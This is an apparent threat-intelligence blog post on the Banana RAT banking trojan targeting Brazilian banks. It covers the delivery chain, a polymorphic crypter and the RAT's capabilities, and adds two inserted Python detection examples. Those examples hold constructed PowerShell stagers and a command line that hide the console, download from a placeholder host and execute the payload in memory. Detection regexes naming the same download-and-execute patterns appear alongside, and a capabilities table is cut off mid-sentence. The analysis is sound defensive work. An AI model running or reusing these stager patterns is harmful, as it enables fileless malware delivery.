Security News

Cybersecurity news aggregator

HIGH Attacks Trend Micro Research

Inside SHADOW-WATER-063’s Banana RAT: From Build Server to Banking Fraud

The article details the operational model of the Banana RAT banking trojan, attributed to threat actor SHADOW-WATER-063, which uses a staged delivery chain starting with a malicious batch file delivered via WhatsApp or phishing. The malware employs obfuscated PowerShell for fileless in-memory execution of AES-wrapped payloads to evade detection and provides operators with remote control, keylogging, screen streaming, and QR code interception capabilities targeting Brazilian financial institutions. The investigation was based on correlating recovered server-side artifacts with client-side telemetry to reconstruct the full attack chain.

Cyber Threats

Inside SHADOW-WATER-063’s Banana RAT: From Build Server to Banking Fraud

In this blog entry, researchers from the TrendAI™ MDR team discuss how they mapped the full end-to-end operation of SHADOW-WATER-063’s Banana RAT banking malware by analyzing server-side artifacts and victim-side data.

By: Aldrin Ceriola, Gabriel Nicoleta, Jovit Samaniego, Mohamed Fahmy
May 19, 2026

Key takeaways

- An MDR investigation correlated attacker infrastructure and endpoint telemetry to map the full operational model of Banana RAT, a banking trojan attributed to a threat activity cluster that TrendAI™ tracks as SHADOW-WATER-063.
- By correlating artifacts such as recovered server tooling and client payloads, TrendAI Vision One™ Services – Managed Detection and Response (MDR) reconstructed the full attack chain, from polymorphic payload generation and staged delivery to in-memory execution and encrypted C&C communication.
- The malware uses layered obfuscation, AES-wrapped payloads, and fileless PowerShell execution to evade detection and persistence controls.
- Once active, it enables operator-driven fraud through remote input control, keylogging, screen streaming, and Pix QR code interception targeting Brazilian financial institutions.

Defenders are often left to piece together how a cyberattack works from limited visibility on infected systems. But during its investigation into a live Brazilian banking trojan operation, the TrendAI Vision One™ Services – Managed Detection and Response (MDR) team caught both sides of it.

While most threat investigations start at the endpoint, this engagement gave us an uncommon view: server-side tooling recovered directly from attacker infrastructure, cross-referenced against client-side telemetry from compromised hosts. The result is a full-chain picture of Banana RAT, the banking trojan of a financially motivated threat actor operating exclusively against Brazilian financial institutions.
In connection with this investigation, TrendAI™ is coordinating with the Federação Brasileira de Bancos (FEBRABAN) to share threat intelligence and support the protection of Brazilian financial institutions and their customers.

Delivery: Victims are lured via WhatsApp or a possible phishing URL into downloading a malicious batch file (Consultar_NF-e.bat) from a campaign-specific domain, convitemundial2026[.]com.

Staged execution: The batch file launches an obfuscated PowerShell command that silently fetches and runs a second-stage payload (msedge.txt) entirely in memory; no decrypted file ever touches disk.

Notable client capability: The client functions as a full remote fraud and surveillance module, combining real-time screen streaming, operator-driven input control, banking-aware overlay injection, QR/Pix transaction manipulation, and continuous keylogging to enable interactive credential theft and unauthorized financial transaction execution.

Attribution: High confidence. Brazilian Portuguese operators, Tetrade-adjacent tradecraft, exclusive targeting of 16 Brazilian financial institutions, and a Pix QR interception subsystem that only exists for the Brazilian market.

Inside a banking trojan operation: Mapping the server and client components

During this engagement, our team recovered both halves of the operation: the attacker's server-side tooling from the delivery infrastructure, and the client-side malware from compromised endpoints. Holding both sides at once is rare, and it lets us describe the full operating model rather than infer it (Figure 1). The component relationship map in Figure 2 captures that model in a single view, with attacker-controlled components on the left, victim-side execution on the right, and a vertical divider marking the trust boundary between them.

Figure 1. Banana RAT’s end-to-end kill chain

On the server side, the operator maintains a clean, unobfuscated PowerShell banker (msedge.txt) as a master source file.
This source is never delivered directly. Instead, it feeds a FastAPI-based crypter service that applies multiple obfuscation layers and an AES-256-CBC wrapper, producing unique, polymorphic builds. The crypter keeps a pre-generated pool of 100 to 200 ready builds at all times so that requests can be served instantly. Each build is published as payload.php and consumed exactly once per victim request, so every delivered sample is byte-unique. A separate analytics dashboard (stats-view.php) ingests web server logs to give the operator real-time visibility into campaign reach by country, ISP, operating system, and client.

On the client side, execution begins with a malicious batch file that invokes PowerShell to retrieve a small staging script from one attacker-controlled host. That stager hides its console window, downloads payload.php from a second attacker-controlled host, and writes it to a world-writable path under a benign filename. It then loads the file into memory, decrypts the AES-wrapped body using the embedded key and IV, and executes the resulting plaintext via ScriptBlock::Create, a fileless pattern in which only the encrypted wrapper is ever written to disk and the decrypted banker exists only in memory. Because the key and IV ship inside the same file, the AES layer is obfuscation rather than protection: anyone holding payload.php can unwrap it, and its value to the operator lies in making every sample byte-unique and keeping the plaintext banker away from on-disk scanners. The unpacked banker establishes persistence and opens a TCP session to the operator's command-and-control host on port 443, where it receives instructions, exfiltrates captured data, and renders bank-specific overlays on demand.

Figure 2. Banana RAT campaign’s attacker infrastructure and victim-side execution chain

The two sides connect at exactly one point: a single HTTP GET request from the staging cradle (st.txt) to payload.php. This is the only arrow crossing the divider in the map, and it marks the precise moment attacker-controlled bytes become victim-side execution.
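The crypter described above makes hash-based blocking futile, so the question for a defender is which fingerprint survives it. The following is an added example, not code from the article or from Trend Micro: it runs over three constructed PowerShell snippets modelled on the stager pattern described here (hidden window, drop under Public\Documents, WebClient download, ScriptBlock::Create plus IEX) and computes three fingerprints for each. Raw SHA-256 differs for every variant; a canonical hash (comments stripped, variables renamed in order of first use, case and whitespace folded) survives renaming but not junk insertion or type-name fragmentation; a capability fingerprint over the behaviours the stager must still perform matches all three. The samples, indicator names and regular expressions are assumptions of this example, and the host uses the reserved .invalid TLD.

```python
"""Added example: which fingerprints survive a polymorphic PowerShell crypter.

SAMPLE_A/B/C are CONSTRUCTED stand-ins for the stager pattern the article
describes; they are not the recovered samples. The download host uses the
reserved .invalid TLD and does not resolve.
"""
import hashlib
import re

SAMPLE_A = r'''
$d = 'C:\Users\Public\Documents'
$w = Add-Type -MemberDefinition '[DllImport("user32.dll")] public static extern bool ShowWindow(IntPtr h, int c);' -Name W -Namespace N -PassThru
$w::ShowWindow((Get-Process -Id $PID).MainWindowHandle, 0)
if (!(Test-Path $d)) { New-Item -ItemType Directory -Path $d | Out-Null }
$c = New-Object Net.WebClient
$c.DownloadFile('http://example.invalid/payload.php', "$d\msedge.txt")
IEX ([ScriptBlock]::Create((Get-Content "$d\msedge.txt" -Raw)))
'''

# B: same structure as A, only variable names, comments and whitespace changed
SAMPLE_B = r'''
# NF-e consulta (constructed comment)
$folderPath = 'C:\Users\Public\Documents'
$api   =   Add-Type -MemberDefinition '[DllImport("user32.dll")] public static extern bool ShowWindow(IntPtr h, int c);' -Name W -Namespace N -PassThru
$api::ShowWindow((Get-Process -Id $PID).MainWindowHandle, 0)
if (!(Test-Path $folderPath)) { New-Item -ItemType Directory -Path $folderPath | Out-Null }   # ensure drop dir
$client = New-Object Net.WebClient
$client.DownloadFile('http://example.invalid/payload.php', "$folderPath\msedge.txt")
IEX ([ScriptBlock]::Create((Get-Content "$folderPath\msedge.txt" -Raw)))
'''

# C: B plus junk statements, a fragmented .NET type name and an aliased cmdlet
SAMPLE_C = r'''
$folderPath = 'C:\Users\Public\Documents'
$seed = [Math]::Abs(7 * 3)          # junk, never used
$api = Add-Type -MemberDefinition '[DllImport("user32.dll")] public static extern bool ShowWindow(IntPtr h, int c);' -Name Qx -Namespace Zy -PassThru
$api::ShowWindow((Get-Process -Id $PID).MainWindowHandle, 0)
if (!(Test-Path $folderPath)) { New-Item -ItemType Directory -Path $folderPath | Out-Null }
$noise = 'x' * 12                   # junk
$client = New-Object Net.WebClient
$client.DownloadFile('http://example.invalid/payload.php', "$folderPath\msedge.txt")
Invoke-Expression ([ScriptBlock]::Create((Get-Content "$folderPath\msedge.txt" -Raw)))
'''

# Automatic variables are left alone so that $PID stays $PID across variants.
AUTOMATIC_VARS = {"pid", "null", "true", "false", "_", "env", "args", "error", "home"}

# Behaviours a stager of this shape must still exhibit, whatever the renaming.
# Indicator names and patterns are assumptions of this example.
INDICATORS = {
    "hide_console_window": r"ShowWindow\s*\(",
    "drop_in_public_documents": r"\\Users\\Public\\Documents",
    "webclient_or_bits_download": r"\.DownloadFile\s*\(|\.DownloadString\s*\(|Start-BitsTransfer",
    "in_memory_scriptblock": r"\[ScriptBlock\]\s*::\s*Create\s*\(",
    "dynamic_eval": r"\b(?:IEX|Invoke-Expression)\b",
    "aes_unwrap": r"Security\.Cryptography\.Aes",
}


def raw_sha256(script: str) -> str:
    """The file hash: byte-unique per served build, so useless for blocking."""
    return hashlib.sha256(script.encode("utf-8")).hexdigest()


def canonicalize(script: str) -> str:
    """Strip line comments, rename $variables in order of first use, fold case
    and whitespace. Defeats renaming only; junk code still changes the result."""
    text = re.sub(r"#[^\n]*", "", script)  # samples carry no '#' inside strings
    names: dict[str, str] = {}

    def rename(m: re.Match) -> str:
        name = m.group(1)
        if name.lower() in AUTOMATIC_VARS:
            return m.group(0)
        return "$" + names.setdefault(name, f"v{len(names) + 1}")

    text = re.sub(r"\$([A-Za-z_][A-Za-z0-9_]*)", rename, text)
    return re.sub(r"\s+", " ", text).strip().lower()


def canonical_sha256(script: str) -> str:
    return hashlib.sha256(canonicalize(script).encode("utf-8")).hexdigest()


def capability_fingerprint(script: str) -> tuple:
    """Sorted names of the behaviours present in the (plaintext) script."""
    return tuple(sorted(n for n, rx in INDICATORS.items() if re.search(rx, script, re.I)))


def is_stager_like(script: str, min_hits: int = 3) -> bool:
    return len(capability_fingerprint(script)) >= min_hits


if __name__ == "__main__":
    for label, s in (("A", SAMPLE_A), ("B", SAMPLE_B), ("C", SAMPLE_C)):
        print(label, raw_sha256(s)[:12], canonical_sha256(s)[:12], capability_fingerprint(s))
```

The capability fingerprint is the level at which AMSI-visible script content should be matched: the obfuscator can rename and pad freely, but every served script must still hide its window, fetch payload.php, write under Public\Documents and hand plaintext to ScriptBlock::Create. Treat the canonical hash as a clustering aid for rename-only variants, not as a blocklist.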
The deliberate separation of delivery infrastructure from command-and-control infrastructure, visible in Figure 2 as the absence of any further crossings, gives the operator resilience: if the delivery host is taken down, existing infections keep communicating with the command-and-control (C&C) host unaffected, and if the C&C host is disrupted, the delivery pipeline remains intact for the next campaign. For defenders, the same geometry shows where intervention is most effective. Blocking the crossing arrow at the network perimeter stops new infections cleanly, while remediating already-compromised hosts requires action against the C&C channel, which the map intentionally leaves outside its frame.

Initial access

From MDR cases, we have observed a possible campaign targeting users in Brazil’s financial sector. Based on available telemetry, the malicious batch file users are tricked into downloading is disguised as an electronic invoice document (Consultar_NF-e.bat). The use of an NF-e (Nota Fiscal Eletrônica) filename is consistent with a business-facing lure, suggesting the actor is targeting corporate users familiar with Brazil's electronic invoicing system.

eventSubId: 603 - TELEMETRY_INTERNET_DOWNLOAD
Downloaded file: C:\Users\<user>\Downloads\Consultar_NF-e[.]bat
Downloaded from: hxxps://convitemundial2026[.]com/Consultar_NF-e[.]bat

Execution

Stager (st.txt / st.php)

Subsequently, the user executes that batch file. The initial stager is a 490-byte PowerShell snippet that hides the console window via user32.ShowWindow, creates C:\Users\Public\Documents\ if absent, downloads the next-stage PowerShell from hxxp://24[.]199[.]90[.]58/payload[.]php using Net.WebClient.DownloadFile, and executes the downloaded payload via IEX of a freshly created ScriptBlock. A larger variant (st.php) uses Start-BitsTransfer with a WebClient fallback for greater reliability through proxies and content filtering (Figure 3).

Figure 3. Initial PowerShell stager (st.txt)

Polymorphic build pipeline (the panel)

Each victim request to payload.php causes the FastAPI panel to pop a pre-generated, hash-unique build from the pool, or to generate one in under one second if the pool is empty (Figure 4). Every served payload differs in variable names, function names, .NET type-name fragmentation, junk-code insertions, XOR keys, and AES-encrypted code blobs, making file-hash detection essentially impossible at population scale (Figure 5).

Figure 4. Pool configuration: 100-200 unique pre-generated builds per delivery folder, refreshed by four parallel generator threads

Figure 5. Nine sequential obfuscation layers applied to every served payload

Upon execution, the script drops msedge.txt, a staged payload file disguised as a text document, which is used to deliver second-stage malicious code for execution via PowerShell (Figure 6). The dropped file is C:\Users\Public\Documents\msedge.txt.

Figure 6. Deobfuscated PowerShell payload captured via AMSI (objectRawDataStr)

Analysis of PowerShell script payload (msedge.txt)

Based on the collected sample, the PowerShell script delivers a banking-focused remote access trojan with capabilities including screen capture, remote input control, keylogging, clipboard manipulation, deceptive banking overlays, file exfiltration, encrypted command-and-control communications, and SYSTEM token abuse, indicative of malware intended to enable fraudulent banking activity and attacker-controlled account compromise. Currently, this script is detected as Backdoor.PS1.BANANARAT.A.

Capability | Description
Live screen streaming | Continuously captures the desktop (all monitors, DPI-aware) using BitBlt and streams JPEG frames to the operator.
Remote input control | Injects mouse movement, clicks, scroll, and keystrokes via the SetCursorPos/mouse_event/keybd_event Win32 APIs.
Input blocking | Calls BlockInput(true) to freeze the victim's keyboard and mouse while the attacker operates the machine.
Keylogger | A GetAsyncKeyState polling loop captures all keystrokes into a 2,000-entry ring buffer, sent to the C&C on demand.
Clipboard monitoring | Reads and optionally modifies clipboard content (for example, replacing crypto wallet addresses).
Pix QR code detection | Uses ZXing library (
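The initial-access and execution steps above (internet download of a .bat, a hidden PowerShell cradle spawned from cmd.exe, a drop under C:\Users\Public\Documents, then PowerShell talking TCP/443) are individually weak signals that become a chain only when correlated per host and in time order. The following is an added example of that correlation, not Trend Micro's detection content and not the Vision One event schema: it runs over constructed endpoint events for two hosts. The field names (kind, image, parent_image, cmdline, dport), the hosts, paths and addresses are assumptions of this example; only eventSubId 603 / TELEMETRY_INTERNET_DOWNLOAD is taken from the article. Addresses are from RFC 5737 documentation ranges and hostnames use the reserved .invalid TLD.

```python
"""Added example: reconstructing the delivery chain from endpoint telemetry.

Not Trend Micro's detection logic and not the Vision One schema. EVENTS,
field names, hosts, paths and addresses are CONSTRUCTED; only
eventSubId 603 / TELEMETRY_INTERNET_DOWNLOAD comes from the article.
"""
import re
from collections import defaultdict

PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

EVENTS = [
    # WS-01: the chain the article describes (constructed events)
    {"host": "WS-01", "ts": 100, "kind": "download", "eventSubId": 603,
     "path": r"C:\Users\ana\Downloads\Consultar_NF-e.bat",
     "url": "https://lure.example.invalid/Consultar_NF-e.bat"},
    {"host": "WS-01", "ts": 130, "kind": "process", "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'cmd.exe /c "C:\Users\ana\Downloads\Consultar_NF-e.bat"'},
    {"host": "WS-01", "ts": 131, "kind": "process", "image": PS_EXE,
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "powershell -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://stage.example.invalid/st.txt')\""},
    {"host": "WS-01", "ts": 133, "kind": "file_write", "image": PS_EXE,
     "path": r"C:\Users\Public\Documents\msedge.txt"},
    {"host": "WS-01", "ts": 140, "kind": "netconn", "image": PS_EXE,
     "dest": "192.0.2.10", "dport": 443},
    # WS-02: an administrator's interactive shell fetching an installer (benign)
    {"host": "WS-02", "ts": 200, "kind": "process", "image": PS_EXE,
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": "powershell.exe"},
    {"host": "WS-02", "ts": 205, "kind": "file_write", "image": PS_EXE,
     "path": r"C:\Users\admin\Downloads\tool.msi"},
    {"host": "WS-02", "ts": 206, "kind": "netconn", "image": PS_EXE,
     "dest": "203.0.113.5", "dport": 443},
]

IS_PS = re.compile(r"\\(?:powershell(?:_ise)?|pwsh)\.exe$", re.I)
IS_CMD = re.compile(r"\\cmd\.exe$", re.I)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden|ShowWindow", re.I)
CRADLE = re.compile(r"DownloadFile|DownloadString|Start-BitsTransfer|\bIEX\b|Invoke-Expression", re.I)
PUBLIC_DOCS = re.compile(r"^[A-Z]:\\Users\\Public\\Documents\\", re.I)


def is_batch_download(e: dict) -> bool:
    return e["kind"] == "download" and e["path"].lower().endswith(".bat")


def is_hidden_cradle_from_cmd(e: dict) -> bool:
    """PowerShell child of cmd.exe, window hidden, with a download/eval token."""
    return (e["kind"] == "process" and bool(IS_PS.search(e["image"]))
            and bool(IS_CMD.search(e["parent_image"]))
            and bool(HIDDEN.search(e["cmdline"])) and bool(CRADLE.search(e["cmdline"])))


def is_public_docs_drop(e: dict) -> bool:
    return e["kind"] == "file_write" and bool(IS_PS.search(e["image"])) and bool(PUBLIC_DOCS.match(e["path"]))


def is_ps_tcp_443(e: dict) -> bool:
    return e["kind"] == "netconn" and bool(IS_PS.search(e["image"])) and e["dport"] == 443


STAGES = (
    ("batch_lure_downloaded", is_batch_download),
    ("cmd_spawns_hidden_powershell_cradle", is_hidden_cradle_from_cmd),
    ("powershell_drops_under_public_documents", is_public_docs_drop),
    ("powershell_direct_tcp_443", is_ps_tcp_443),
)
CORE = frozenset(name for name, _ in STAGES[:3])


def reconstruct_chain(events: list) -> dict:
    """Per host, the stage names matched in order. Each stage must be satisfied
    by an event at or after the event that satisfied the previous matched stage."""
    by_host = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        by_host[e["host"]].append(e)
    chains = {}
    for host, evs in by_host.items():
        matched, floor = [], -1
        for name, pred in STAGES:
            hit = next((e for e in evs if e["ts"] >= floor and pred(e)), None)
            if hit is not None:
                matched.append(name)
                floor = hit["ts"]
        chains[host] = matched
    return chains


def verdict(stages: list) -> bool:
    """Alert only when all three core stages are present; PowerShell on TCP/443
    is supporting evidence and is never sufficient on its own."""
    return CORE <= set(stages)


if __name__ == "__main__":
    for host, stages in reconstruct_chain(EVENTS).items():
        print(host, "ALERT" if verdict(stages) else "info", stages)
```

The verdict deliberately requires the download, the hidden cradle and the Public\Documents drop together and treats PowerShell talking on TCP/443 as corroboration only: on its own that is routine (module installs, proxied updates) and would fire on WS-02. The ordering check, each stage at or after the previous one, is what turns four weak signals into one chain; a netconn that precedes the drop belongs to something else.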
